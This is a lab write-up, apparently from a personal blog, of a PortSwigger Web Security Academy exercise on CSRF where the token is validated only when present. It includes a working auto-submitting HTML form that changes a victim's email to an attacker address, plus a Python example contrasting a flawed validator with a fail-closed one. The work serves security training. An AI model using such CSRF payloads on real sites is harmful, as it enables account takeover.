
[PortSwigger] CSRF where token validation depends on token being present

by meanjung 2021. 10. 16.

https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present

 

Lab: CSRF where token validation depends on token being present | Web Security Academy

This lab's email change functionality is vulnerable to CSRF. To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to ...

portswigger.net

The difference from the previous lab is that changing the request to GET returns a 404.

 

Some applications correctly validate the token when it is present but skip the validation if the token is omitted.

The difference is that the application does validate the CSRF token, but when the CSRF token is absent it simply skips the check.

 

<html>
    <body>
        <iframe style="display: none" name="csrf-frame"></iframe>
        <form method='POST' action="https://ac441f2f1---00d8.web-security-academy.net/my-account/change-email" target="csrf-frame" id="csrf-form">
            <!-- The form carries only the email field; no CSRF token parameter is sent -->
            <input type="hidden" name="email" value="attacker&#64;attacker&#46;net"/>
            <input type="submit" value="submit">
        </form>
        <script>
            document.getElementById("csrf-form").submit();
        </script>
    </body>
</html>
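
The server-side flaw described above, next to a fail-closed check, as an added example that is not from the original post or from PortSwigger. The lab's backend code is not shown on the page, so the function names, the `csrf` parameter name and the sample request bodies are assumptions constructed for illustration.

```python
import hmac
import secrets

# Constructed sample data: the CSRF token the server issued for one session.
SESSION_TOKEN = secrets.token_urlsafe(32)


def validate_flawed(form: dict, session_token: str) -> bool:
    """Flawed pattern: the token is only checked when the parameter exists."""
    token = form.get("csrf")  # "csrf" is an assumed parameter name
    if token is None:
        return True  # validation silently skipped, request is accepted
    return hmac.compare_digest(token, session_token)


def validate_strict(form: dict, session_token: str) -> bool:
    """Hardened pattern: a missing or empty token is a failure (fail closed)."""
    token = form.get("csrf")
    if not isinstance(token, str) or not token or not session_token:
        return False
    # Compare as bytes so non-ASCII input cannot raise inside compare_digest.
    return hmac.compare_digest(token.encode(), session_token.encode())


def run_cases(validator) -> dict:
    """Run one validator over constructed POST bodies for the email change."""
    cases = {
        "valid_token": {"email": "user@example.com", "csrf": SESSION_TOKEN},
        "wrong_token": {"email": "user@example.com", "csrf": "x" * 43},
        "empty_token": {"email": "user@example.com", "csrf": ""},
        "missing_token": {"email": "user@example.com"},
    }
    return {name: validator(form, SESSION_TOKEN) for name, form in cases.items()}


if __name__ == "__main__":
    for validator in (validate_flawed, validate_strict):
        print(validator.__name__, run_cases(validator))
```

Only the `missing_token` case differs between the two validators, which is why a test suite that checks wrong tokens but never omits the parameter does not catch this bug.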
